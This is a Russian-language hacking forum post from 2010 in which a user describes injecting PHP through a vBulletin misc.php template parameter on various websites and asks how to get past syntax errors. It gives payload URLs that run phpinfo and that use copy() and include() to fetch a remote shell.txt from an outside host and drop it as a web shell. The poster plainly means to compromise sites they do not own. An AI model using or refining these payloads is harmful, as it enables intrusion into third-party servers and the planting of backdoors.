HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.09.2010, 15:11
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Вобщем пользовался уязвимостью для вбулки для выполнения пхп команд на сайте, вот он:

/misc.php?do=page&template={${phpinfo}}

Пхпинфо конечно же отлично работает я решил попробывать функцию copy:

/misc.php?do=page&template={${copy('http://sait/shell.txt','s.php');}}

Но выдало ошибкуarse error: syntax error, unexpected '%', expecting ')' in

Я потом попробывал Get:

/misc.php?do=page&template={${include($_GET[aa]);&aa=http://mypet-style.ru/backup/1/shell.txt}}

И получил ошибкуarse error: syntax error, unexpected ';' in ...

Как это обойти, да и что он от меня вобще хочет? Убераю точку с запятой в запросе, тогда ему не нравиться знак ровно.

Вобщем на одном сайте только получилось с GET а на всех остальных syntax error ...

Посоветуйте что нибудь?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ